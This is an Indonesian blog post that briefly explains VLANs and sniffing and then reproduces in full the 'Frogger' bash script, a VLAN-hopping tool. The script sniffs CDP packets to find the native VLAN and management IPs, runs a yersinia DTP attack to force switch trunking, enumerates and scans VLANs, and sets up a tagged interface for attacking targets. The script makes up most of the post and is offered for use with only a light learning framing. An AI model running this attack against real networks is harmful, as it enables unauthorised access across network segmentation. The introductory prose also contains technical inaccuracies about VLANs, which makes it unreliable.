widgets

» Unlabelled » Frogger - The VLAN Hooper And VLAN Hop

Selasa, 20 Januari 2015

Frogger - The VLAN Hooper And VLAN Hop

Kali ini saya akan membahas mengenai frogger.sh yang saya temukan pada situs official nya disini, Baiklah kita akan berbicara mengenai fungsi dari frogger ini, frogger berfungsi untuk sniffer paket-paket yang ada pada Virtual Local Area Network (Vlan) yang menghendus paket-paket dalam Cisco Discovery Protocol (CDP). Jika anda belum tau apa itu sniffer, akan saya jelaskan disini juga. Sniffer adalah pelaku/penyerang yang melakukan penghendusan atau penangkapan paket-paket data sebuah jaringan (itu menurut saya), mungkin arti lebih luasnya anda bisa mencoba mencari didalam search engine google. 

VLAN adalah sebuah grup dari segmentasi dalam LAN yang berbasiskan internet protocol (IP) atau biasanya diartikan sebagai segmentasi IP yang digunakan sebagai pengalamatan komputer. Analoginya jigak suatu jaringan dibentuk maka seorang network engineer harus menciptakan pengalamatan yang digunakan sebagain alamat jaringan (ya kayak nomer hape gitulah). Namun jika menggunakan switch yang jenis unmanaged(no VLAN supported) maka hanya ada 1 collision domain. Ini sangat tidak efisien sekali digunakan dan mengakibatkan sering terjadinya conflict antar IP yang merugikan user dalam pemakaian resource jaringan. Untuk itu diperlukan suatu segmentasi dalam IP address yang berguna mencegah terjadinya collision domain. Hal ini hanya dapat diwujudkan dengan adanya VLAN yang bertindak seolah-olah ada segmen lain dalam 1 switch. Kegunaan VLAN : 
  1. Mencegah terjadinya collision domain
  2. Mempersempit kemungkinan terjadinya conflict IP yang terlalu banyak
  3. Mengurangi tingkat vulnerabilities 
Sekarang kita akan membahas bagaimana cara menjalankan tool frogger.sh yang berbasis bash ini, perlu anda ketahui jika anda menggunakan distro backtrack arp telah terinstal default dengan versi arp-1.6. Akan tetapi frogger akan berjalan di arp-1.8, maka dari itu anda bisa menginstalnya terlebih dahulu dengan cara:
  1. Download arp-1.8 disini
  2. ekstrak arp yang udah diinstal tadi
  3. masuk kedalam direktori arp yang telah di ekstrak lalu instal dengan cara 
  • ./configure
  • make
  • make install
Dan sekarang arp-1.8 anda telah terinstal, cek di terminal dengan perintah arp --version untuk melihat versi barunya. kemudian download tool frogger.sh disini ekstrak dan jalankan, anda bisa melihat sendiri tutorial video dibawah ini serta lampiran script froggernya. Selamat belajar (^_^)




#!/usr/bin/env bash
# Frogger - The VLAN Hopper script
# Daniel Compton
# www.commonexploits.com
# contact@commexploits.com
# Twitter = @commonexploits
# 28/11/2012
# Requires arp-scan >= 1.8 for VLAN tagging, yersinia, tshark and screen
# Tested on Bactrack 5 with Cisco devices - it can be used over SSH
VERSION="1.4"

# User configuration Settings
TAGSEC="90" #change this value for the number of seconds to sniff for 802.1Q tagged packets
CDPSEC="90" # change this value for the number of seconds to sniff for CDP packets
DTPWAIT="20" # amount of time to wait for DTP attack via yersinia to trigger

# Variables needed throughout execution, do not touch
MANDOM=""
NATID=""
DEVID=""
MANIP=""

# Script starts
ARPVER="`arp-scan -V 2>&1 | grep \"arp-scan [0-9]\" | cut -f 2 -d\" \"`"
clear
echo -e "\e[00;32m########################################################\e[00m"
echo "***   Frogger - The VLAN Hopper Version $VERSION  ***"
echo "***   Auto enumerates VLANs and Discovers devices ***"
echo -e "\e[00;32m########################################################\e[00m"
echo ""
echo -e "\e[00;34m-------------------------------------------\e[00m"
echo "Checking dependencies"
echo -e "\e[00;34m-------------------------------------------\e[00m"

#Check for yersinia
which yersinia >/dev/null
if [ $? -eq 0 ]
then
echo ""
    echo -e "\e[00;32mI have found the required Yersinia program\e[00m"
else
echo ""
    echo -e "\e[00;31mUnable to find the required Yersinia program, install and try again\e[00m"
    exit 1
fi

#Check for tshark
which tshark >/dev/null
if [ $? -eq 0 ]
then
echo ""
echo -e "\e[00;32mI have found the required tshark program\e[00m"
else
echo ""
echo -e "\e[00;31mUnable to find the required tshark program, install and try again\e[00m"
echo ""
    exit 1
fi

#Check for screen
which screen >/dev/null
if [ $? -eq 0 ]
then
echo ""
echo -e "\e[00;32mI have found the required screen program\e[00m"
else
echo ""
echo -e "\e[00;31mUnable to find the required screen program, install and try again\e[00m"
echo ""
    exit 1
fi

#Check for arpscan
which arp-scan >/dev/null
if [ $? -eq 1 ]
then
echo -e "\e[00;31mUnable to find the required arp-scan program, install at least version 1.8 and try again. Download from www.nta-monitor.com\e[00m"
echo ""
    exit 1
else
compare_arpscan="`echo "$ARPVER < 1.8" | bc`"
if [ $compare_arpscan -eq 1 ]; then
echo ""
echo -e "\e[00;31mUnable to find version 1.8 of arp-scan, 1.8 is required for VLAN tagging. Install at least version 1.8 and try again. Download from www.nta-monitor.com\e[00m"
exit 1
else
echo ""
echo -e "\e[00;32mI have found the required version of arp-scan\e[00m"

fi
fi

echo ""
echo "----------------------------------- Settings -------------------------------------"
echo ""
echo -e "Sniffer settings for CDP are set to \e[00;32m$CDPSEC\e[00m seconds"
echo ""
echo -e "Sniffer settings for tagged packets are set to \e[00;32m$TAGSEC\e[00m seconds"
echo ""
echo "----------------------------------------------------------------------------------"
echo -e " Press ENTER to continue or CTRL-C to cancel... \c"
read enterkey
clear

echo -e "\e[1;33m----------------------------------------\e[00m"
echo "The following Interfaces are available"
echo -e "\e[1;33m----------------------------------------\e[00m"
ifconfig | grep -o "eth.*" |cut -d " " -f1
echo -e "\e[1;31m--------------------------------------------------\e[00m"
echo "Enter the interface to scan from as the source"
echo -e "\e[1;31m--------------------------------------------------\e[00m"
read INT
ifconfig | grep -i -w $INT >/dev/null

if [ $? = 1 ]
then
echo ""
echo -e "\e[1;31mSorry the interface you entered does not exist! - check and try again.\e[00m"
echo ""
exit 1
else
echo ""
fi
clear
echo ""
echo -e "\e[1;33mNow Sniffing CDP Packets on $INT - Please wait for "$CDPSEC" seconds...\e[00m"
echo ""

OUTPUT="`tshark -a duration:$CDPSEC -i $INT -R \"cdp\" -V 2>&1 | sort --unique`"
printf -- "${OUTPUT}\n" | while read line
do
case "${line}" in
VTP\ Management\ Domain:*)
            if [ -n "$MANDOM" ]
            then
                continue
            fi
MANDOM="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"
if [ "$MANDOM" = "Domain:" ]
then
echo -e "\e[1;33mThe VTP domain appears to be set to NULL on the device. Script will continue..\e[00m"
echo ""
echo -e "\e[1;33mPress the Enter key to continue\e[00m"
read enterkey
elif [ -z "$MANDOM" ]
then
echo -e "\e[1;33mI didn't find any VTP management domain within CDP packets. Possibly CDP is not enabled. Script will continue..\e[00m"
echo ""
echo -e "\e[1;33mPress the Enter key to continue\e[00m"
read enterkey
else
echo -e "\e[1;33m----------------------------------------------------------\e[00m"
echo "The following Management domains were found"
echo -e "\e[1;33m----------------------------------------------------------\e[00m"
echo -e "\e[00;32m$MANDOM\e[00m"
echo ""
fi
;;
Native\ VLAN:*)
            if [ -n "$NATID" ]
            then
                continue
            fi
NATID="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"
if [ -z "$NATID" ]
then
echo -e "\e[1;33mI didn't find any Native VLAN ID within CDP packets. Perhaps CDP is not enabled.\e[00m"
echo ""
echo -e "\e[1;33mPress the Enter key to continue\e[00m"
read enterkey
else
echo -e "\e[1;33m------------------------------------------------\e[00m"
echo "The following Native VLAN ID was found"
echo -e "\e[1;33m------------------------------------------------\e[00m"
echo -e "\e[00;32m$NATID\e[00m"
echo ""
fi
;;
*RELEASE\ SOFTWARE*)
            if [ -n "$DEVID" ]
            then
                continue
            fi
DEVID="`printf -- \"${line}\n\" | awk '{sub(/^[ \t]+/, ""); print}'`"
if [ -z "$DEVID" ]
then
echo -e "\e[1;33mI didn't find any devices. Perhaps it is not a Cisco device.\e[00m"
echo ""
echo -e "\e[1;33mPress the Enter key to continue\e[00m"
read enterkey
else
echo -e "\e[1;33m------------------------------------------------\e[00m"
echo "The following Cisco device was found"
echo -e "\e[1;33m------------------------------------------------\e[00m"
echo -e "\e[00;32m$DEVID\e[00m"
echo ""
fi
;;
IP\ address:*)
            if [ -n "$MANIP" ]
            then
                continue
            fi
MANIP="`printf -- \"${line}\n\" | cut -f2 -d\":\"`"
if [ -z "$MANIP" ]
then
echo -e "\e[00;31mI didn't find any management addresses within CDP packets. Try increasing the CDP time and try again!\e[00m"
exit
else
echo -e "\e[1;33m---------------------------------------------------\e[00m"
echo "The following Management IP Addresses were found"
echo -e "\e[1;33m---------------------------------------------------\e[00m"
echo -e "\e[00;32m$MANIP\e[00m"
echo $MANIP >MANIPTMP
echo ""
fi
;;
esac
done

echo ""
echo -e "\e[1;33mNow Running DTP Attack on interface $INT, waiting "$DTPWAIT" seconds to trigger\e[00m"
echo ""
screen -d -m -S yersina_dtp yersinia dtp -attack 1 -interface $INT
sleep $DTPWAIT
#clear

echo ""
echo -e "\e[1;33mNow Extracting VLAN IDs on interface $INT, sniffing 802.1Q tagged packets for "$TAGSEC" seconds...\e[00m"
echo ""

VLANIDS=`tshark -a duration:$TAGSEC -i $INT -R "vlan" -x -V 2>&1 |grep -o " = ID: .*" |awk '{ print $NF }' | sort --unique`
#clear

if [ -z "$VLANIDS" ]
then
echo -e "\e[00;31mI didn't find any VLAN IDs within 802.1Q tagged packets. Try increasing the tagged time (TAGSEC) and try again!\e[00m"
exit 1
else
echo -e "\e[1;33m------------------------------------\e[00m"
echo "The following VLAN IDs were found"
echo -e "\e[1;33m------------------------------------\e[00m"
echo -e "\e[00;32m$VLANIDS\e[00m"
echo -e "\e[1;33m------------------------------------\e[00m"
echo ""
echo -e "Press ENTER to continue and scan VLANs for live devices"
fi
read enterkey
clear

SCANSDTP=$(cat MANIPTMP |cut -d "." -f 1,2,3)
echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"
echo "Enter the IP address or CIDR range you wish to scan i.e 192.168.1.1 or 192.168.1.0/24"
echo ""
echo "Looking at the management address, try to scan "$SCANSDTP".0/24"
echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"
read IPADDRESS

rm MANIPTMP 2>&1 >/dev/null
clear
for VLANIDSCAN in $(echo "$VLANIDS") 
do
echo -e "\e[1;33m---------------------------------------------------------------------------\e[00m"
echo -e "Now scanning \e[00;32m$IPADDRESS - VLAN $VLANIDSCAN\e[00m for live devices"
echo -e "\e[1;33m---------------------------------------------------------------------------\e[00m"
arp-scan -Q $VLANIDSCAN -I $INT $IPADDRESS -t 500 2>&1 |grep "802.1Q VLAN="
if [ $? = 0 ]
then
echo -e "\e[00;32mDevices were found in VLAN "$VLANIDSCAN"\e[00m"
else
echo -e "\e[01;31mNo devices found in VLAN "$VLANIDSCAN"\e[00m"
fi
done

#Menu choice for creating VLAN interface
echo ""
echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"
showMenu () {
echo "1) Select 1 to create a new local VLAN Interface for attacking the target"
echo "2) Select 2 to exit script - this will kill all processes"
echo -e "\e[1;31m------------------------------------------------------------------------------------------\e[00m"
}

while [ 1 ]
do
showMenu
read CHOICE
case "$CHOICE" in
"1")
echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"
echo  "Enter the VLAN ID to Create"
echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"
read VID
echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"
echo "Enter the IP address you wish to assign to the new VLAN interface $VID i.e 192.168.1.100/24"
echo -e "\e[1;31m-------------------------------------------------------------------------------------------------------------------------\e[00m"
read VIP
modprobe 8021q
vconfig add $INT $VID
ifconfig $INT.$VID up
ifconfig $INT.$VID $VIP
echo -e "\e[1;32m--------------------------------------------------------------------------------------------------\e[00m"
echo "The following interface is now configured locally"
echo "#################################################################################################"
echo -e "Interface \e[1;32m$INT.$VID\e[00m with IP Address \e[1;32m$VIP\e[00m"
echo "#################################################################################################"
echo -e "\e[1;32m----------------------------------------------------------------------------------------------------\e[00m"
;;
"2")
ps -ef | grep "[Yy]ersinia dtp" >/dev/null
if [ $? = 0 ]
then
killall yersinia
echo -e "\e[1;32mDTP attack has been stopped\e[00m"
exit 1
else
exit 1
fi
;;
esac
done
#END
source:
sumber:http://selpacode.blogspot.com/2013/05/frogger-vlan-hooper-and-vlan-hop.html

Ditulis Oleh : Unknown // 06.59
Kategori:

Diposting oleh di 06.59 Read more

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 

Blogroll

About

xxx